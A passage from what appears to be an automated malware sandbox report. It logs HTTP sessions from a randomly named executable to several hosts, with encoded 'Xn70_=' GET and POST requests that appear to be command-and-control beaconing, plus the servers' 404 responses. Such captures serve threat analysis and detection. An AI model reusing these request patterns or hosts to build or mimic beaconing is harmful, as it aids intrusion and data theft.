                      Data Raw: 58 6e 37 30 5f 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 51 51 6c 53 34 69 42 43 59 31 32 30 41 51 56 6b 4f 6c 47 65 42 42 73 6f 37 7a 61 70 38 48 6f 2b 49 65 54 65 4a 70 39 59 5a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 6c 2f 45 57 42 66 67 46 43 65 74 48 73 59 6a 6a 44 59 34 67 56 6a 6e 38 63 67 4b 48 4a 52 4c 61 30 4d 57 48 6c 34 2f 68 57 57 41 44 7a 62 4a 4a 6f 48 4f 44 68 6f 69 54 4e 33 62 68 69 37 41 73 64 58 43 6d 6d 74 49 75 4c 62 70 62 62 64 42 55 66 [TRUNCATED]
                      Data Ascii: Xn70_=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nQQlS4iBCY120AQVkOlGeBBso7zap8Ho+IeTeJp9YZa+dDVuASdH80pu6GzO8LsQjNsgFwgJECml/EWBfgFCetHsYjjDY4gVjn8cgKHJRLa0MWHl4/hWWADzbJJoHODhoiTN3bhi7AsdXCmmtIuLbpbbdBUfBnbs5SnAx1Fyygt3JynWfLwerQZlPVhHmdiGPB40Ms1PSSmOMMkvynYlMFzLtnTAw1NN1G/BLAC9zSUF/vYFODbM7O37Vb162BdC6bkZjAYFAS0MdUUPs4XljBY3FkVUe65X7tdaP9amKlVochr+RXH4182WK6uaSOkFIP56siDFywykjnoHJH32F2ua3z59AQndjZbKsHDA60SUhbEdGuO4fb+7R9zYe2K+7UG1iE8xuIMKUfJw6yo5H5xrbgqMPm2AHsxB7VFvsUo4Yh4TuzbUj7vgH/bCMtdgbqy2Dr/W3NW4O0qj6yslc4PAxuUI3gOAvyM0vCFrga0aJfRbyXBW4qWDS+AzQp48LPL9a8E3Lz3qALiZ6rDPXnLSD8SXrY90smstyLO4QLRgecBihVmQ3V8U7mXoTW5vsNY8R806uJ+Tfh0AvWX7/jCsR8xef+0AZ5c42BWq3LGPj7bYPKmiB27SabncM0f+G71E3OgCxfr+Yd5v+eG3Ewfv+r220m5s38RnV9mAXuwvmpnb+i7PJDeLC2JXwblFyLIsFgNowft5Rs5ONSgliMG+eHzNk0qXosGqLJU3gKmW6/TYrN+OU8RCZvnUxZ6Zhji96vZYrxFEyTrV68Au3nn5zUJB3ygn3cy6Or4mtSegjjgoztsDiSP/HkgK2T [TRUNCATED]
                      Aug 23, 2024 08:26:28.965934038 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:28 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                      Aug 23, 2024 08:26:28.965971947 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                      Aug 23, 2024 08:26:28.965982914 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                      Aug 23, 2024 08:26:28.965993881 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                      Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                      Aug 23, 2024 08:26:28.966002941 CEST1236INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                      Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                      Aug 23, 2024 08:26:28.966013908 CEST1236INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                      Aug 23, 2024 08:26:28.966023922 CEST776INData Raw: 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                      Data Ascii: nline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file
                      Aug 23, 2024 08:26:28.966036081 CEST1236INData Raw: 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d
                      Data Ascii: nk: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #0
                      Aug 23, 2024 08:26:28.966046095 CEST1236INData Raw: 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70
                      Data Ascii: luish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98)
                      Aug 23, 2024 08:26:28.966057062 CEST1236INData Raw: 2d 67 72 61 64 69 65 6e 74 2d 2d 79 65 6c 6c 6f 77 2d 74 6f 2d 67 72 65 65 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 44 31 45 34 44 44 20 31 30 30 25 29 3b 2d 2d 77 70
                      Data Ascii: -gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg, #E4D1D1 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-red: linear-gradient(160deg, #EEEADD 0%, #
                      Aug 23, 2024 08:26:28.970944881 CEST1236INData Raw: 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65
                      Data Ascii: lined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.64972837.187.158.211806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:30.648657084 CEST511OUTGET /t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:31.507069111 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:31 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                      Aug 23, 2024 08:26:31.507110119 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                      Aug 23, 2024 08:26:31.507122040 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                      Aug 23, 2024 08:26:31.507230997 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                      Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                      Aug 23, 2024 08:26:31.507250071 CEST1236INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                      Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                      Aug 23, 2024 08:26:31.507261038 CEST1236INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                      Aug 23, 2024 08:26:31.507383108 CEST1236INData Raw: 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                      Data Ascii: nline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file
                      Aug 23, 2024 08:26:31.507397890 CEST1236INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 67 72 65 65 6e 3a 20 23 44 31 45 34 44 44 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 75 65 3a 20 23 44 31 44 46 45 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                      Data Ascii: wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--red: #E4D1D1;--wp--preset--color--orange: #E4DAD1;--wp--preset--color--yellow: #EEEADD;--wp--preset--gradient--vivid
                      Aug 23, 2024 08:26:31.507410049 CEST332INData Raw: 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c
                      Data Ascii: 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%
                      Aug 23, 2024 08:26:31.507422924 CEST1236INData Raw: 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e
                      Data Ascii: r-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--gradient--purple-to-yellow: linear-gradient(160deg, #D1D1E4 0%, #EEEADD 1
                      Aug 23, 2024 08:26:31.512497902 CEST1236INData Raw: 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63
                      Data Ascii: preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--pr


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.649729167.172.133.32806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:36.650914907 CEST763OUTPOST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 53 32 75 4a 39 75 7a 50 72 47 39 53 70 6f 73 6b 6b 48 73 31 58 46 32 30 6b 49 38 61 79 68 61 34 52 72 48 33 56 53 46 54 58 69 78
                      Data Ascii: Xn70_=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iS2uJ9uzPrG9SposkkHs1XF20kI8ayha4RrH3VSFTXix
                      Aug 23, 2024 08:26:37.117222071 CEST369INHTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:37 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.649731167.172.133.32806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:39.200001001 CEST787OUTPOST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
